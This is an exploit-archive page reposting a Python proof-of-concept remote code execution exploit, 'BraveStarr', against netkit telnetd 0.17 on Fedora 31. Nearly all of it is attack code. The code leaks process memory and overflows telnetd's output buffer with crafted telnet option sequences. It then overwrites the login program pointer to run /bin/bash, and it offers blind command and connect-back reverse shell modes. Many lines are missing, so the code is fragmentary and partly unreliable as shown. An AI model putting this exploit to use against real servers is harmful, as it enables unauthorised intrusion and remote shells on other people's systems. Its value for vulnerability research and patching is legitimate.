Exploits / Vulnerability Discovered : 2020-03-02 |
Type : remote |
Platform : linux
This exploit / vulnerability Netkittelnet0.17 telnetd (fedora 31) bravestarr remote code execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python3
# BraveStarr
# ==========
# Proof of Concept remote exploit against Fedora 31 netkit-telnet-0.17 telnetd.
# This is for demonstration purposes only. It has by no means been engineered
# to be reliable: 0xff bytes in addresses and inputs are not handled, and a lot
# of other constraints are not validated.
# AppGate (C) 2020 / Ronald Huizer / @ronaldhuizer
import argparse
import base64
import fcntl
import gzip
import socket
import struct
import sys
import termios
import time
class BraveStarr(object):
SE = 240 # 0xf0
DM = 242 # 0xf2
AO = 245 # 0xf5
SB = 250 # 0xfa
WILL = 251 # 0xfb
WONT = 252 # 0xfc
DO = 253 # 0xfd
IAC = 255 # 0xff
# Try to ensure the remote side will read a full 8191 bytes for
# `netobuf_fill' to work properly.
self.sd.setsockopt(socket.IPPROTO_TCP, socket.TCP_MAXSEG, 8191)
def netobuf_fill(self, delta):
# This populates the prefix of `netobuf' with IAC WONT SB triplets.
# This is not relevant now, but during the next time data is sent and
# `netobuf' will be reprocessed in `netclear' will calls `nextitem'.
# The `nextitem' function will overindex past `nfrontp' and use these
# triplets in the processing logic.
s = self.do(self.SB) * delta
# IAC AO will cause netkit-telnetd to add IAC DM to `netobuf' and set
# `neturg' to the DM byte in `netobuf'.
s += self.ao()
# In this request, every byte in `netibuf' will store a byte in
# `netobuf'. Here we ensure that all `netobuf' space is filled except
# for the last byte.
s += self.ao() * (3 - (self.NETOBUF_SIZE - len(s) - 1) % 3)
# We fill `netobuf' with the IAC DO IAC pattern. The last IAC DO IAC
# triplet will write IAC to the last free byte of `netobuf'. After
# this `netflush' will be called, and the DO IAC bytes will be written
# to the beginning of the now empty `netobuf'.
s += self.do(self.IAC) * ((self.NETOBUF_SIZE - len(s)) // 3)
# Send it out. This should be read in a single read(..., 8191) call on
# the remote side. We should probably tune the TCP MSS for this.
# We need to ensure this is written to the remote now. This is a bit
# of a kludge, as the remote can perfectly well still merge the
# separate packets into a single read(). This is less likely as the
# time delay increases. To do this properly we'd need to statefully
# match the responses to what we send. Alack, this is a PoC.
def reset_and_sync(self):
# After triggering the bug, we want to ensure that nbackp = nfrontp =
# netobuf We can do so by getting netflush() called, and an easy way to
# accomplish this is using the TELOPT_STATUS suboption, which will end
# with a netflush.
# We resynchronize on the output we receive by loosely scanning if the
# TELOPT_STATUS option is there. This is not a reliable way to do
# things. Alack, this is a PoC.
s = b""
status = b"%s%c" % (self.sb(), self.TELOPT_STATUS)
while status not in s and not s.endswith(self.se()):
s += self.sd.recv(self.NETOBUF_SIZE)
def telopt_status(self, mode=None):
if mode is None: mode = self.TELQUAL_SEND
s = b"%s%c%c%s" % (self.sb(), self.TELOPT_STATUS, mode, self.se())
def trigger(self, delta, prefix=b"", suffix=b""):
assert b"\xff" not in prefix
assert b"\xff" not in suffix
s = prefix
# Add a literal b"\xff\xf0" to `netibuf'. This will terminate the
# `nextitem' scanning for IAC SB sequences.
s += self.se()
s += self.do(self.IAC) * delta
# IAC AO will force a call to `netclear'.
s += self.ao()
s += suffix
def infoleak(self):
# We use a delta that creates a SB/SE item
delta = 512
self.trigger(delta, self.leak_marker)
s = b""
while self.leak_marker not in s:
ret = self.sd.recv(8192)
except socket.timeout:
self.fatal('infoleak unsuccessful.')
if ret == b"":
self.fatal('infoleak unsuccessful.')
s += ret
return s
def infoleak_analyze(self, s):
m = s.rindex(self.leak_marker)
s = s[:m-20] # Cut 20 bytes of padding off too.
# Layout will depend on build. This works on Fedora 31.
self.values['net'] = struct.unpack("<I", s[-4:])[0]
self.values['neturg'] = struct.unpack("<Q", s[-12:-4])[0]
self.values['pfrontp'] = struct.unpack("<Q", s[-20:-12])[0]
self.values['netip'] = struct.unpack("<Q", s[-28:-20])[0]
# Resolve Fedora 31 specific addresses.
self.addresses['netibuf'] = (self.values['netip'] & ~4095) + 0x980
adjustment = len(max(self.netibuf_deltas, key=len))
for k, v in self.netibuf_deltas.items():
self.addresses[k] = self.addresses['netibuf'] + v
def _scratch_build(self, cmd, argv, envp):
# We use `state_rcsid' as the scratch memory area. As this area is
# fairly small, the bytes after it on the data segment will likely
# also be used. Nothing harmful is contained here for a while, so
# this is okay.
scratchpad = self.addresses['state_rcsid']
exec_stub = b"/bin/bash"
rcsid = b""
data_offset = (len(argv) + len(envp) + 2) * 8
# First we populate all argv pointers into the scratchpad.
argv_address = scratchpad
for arg in argv:
rcsid += struct.pack("<Q", scratchpad + data_offset)
data_offset += len(arg) + 1
rcsid += struct.pack("<Q", 0)
# Next we populate all envp pointers into the scratchpad.
envp_address = scratchpad + len(rcsid)
for env in envp:
rcsid += struct.pack("<Q", scratchpad + data_offset)
data_offset += len(env) + 1
rcsid += struct.pack("<Q", 0)
# Now handle the argv strings.
for arg in argv:
rcsid += arg + b'\0'
# And the environment strings.
for env in envp:
rcsid += env + b'\0'
# Finally the execution stub command is stored here.
stub_address = scratchpad + len(rcsid)
rcsid += exec_stub + b"\0"
# The initial exploitation vector: this overwrite the area after
# `netobuf' with updated pointers values to overwrite `loginprg'
v = struct.pack("<Q", self.addresses['netibuf']) # netip
v += struct.pack("<Q", self.addresses['loginprg']) # pfrontp
v += struct.pack("<Q", 0) # neturg
v += struct.pack("<I", self.values['net']) # net
v = v.ljust(48, b'\0') # padding
self.trigger(len(v), v + struct.pack('<Q', stub), b"A" * 8)
s = b""
s += self._fill_area('state_rcsid', 'loginprg', 8)
s += rcsid
s += self._fill_area('ptyslavefd', 'state_rcsid', len(rcsid))
s += struct.pack("<I", 5)
s += self._fill_area('environ', 'ptyslavefd', 4)
s += struct.pack("<Q", envp)
s += self._fill_area('LastArgv', 'environ', 8)
s += struct.pack("<Q", argv) * 2
s += self._fill_area('remote_host_name', 'LastArgv', 16)
s += b"-c\0"
# We need to finish `getterminaltype' in telnetd and ensure `startslave' is
# called.
method_infoleak_parser = method_parser.add_parser('leak', help='Leaks memory of the remote process')
method_cmd_parser = method_parser.add_parser('command', help='Executes a blind command on the remote')
method_cmd_parser.add_argument('command', help='Command to execute')
method_shell_parser = method_parser.add_parser('shell', help='Spawns a shell on the remote and connects back')
method_shell_parser.add_argument('-c', '--callback', dest='callback', required=True, help='Host to connect back a shell to')
args = parser.parse_args()
for line in gzip.decompress(base64.b64decode(banner)).split(b"\n"):
sys.stdout.buffer.write(line + b"\n")
t = BraveStarr(args.hostname, port=args.port, timeout=args.timeout,
callback_host=getattr(args, 'callback', None))
print(f"\u26e4 Connecting to {args.hostname}:{args.port}")
# For the `shell' method, we set up a listening socket to receive the callback
# shell on.
if args.method == 'shell':
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sd.bind(('', 12345))
print("\n\u26e4 Resolved addresses")
adjustment = len(max(t.netibuf_deltas, key=len))
for k, v in t.netibuf_deltas.items():
print(f" {k:<{adjustment}}: {t.addresses[k]:#016x}")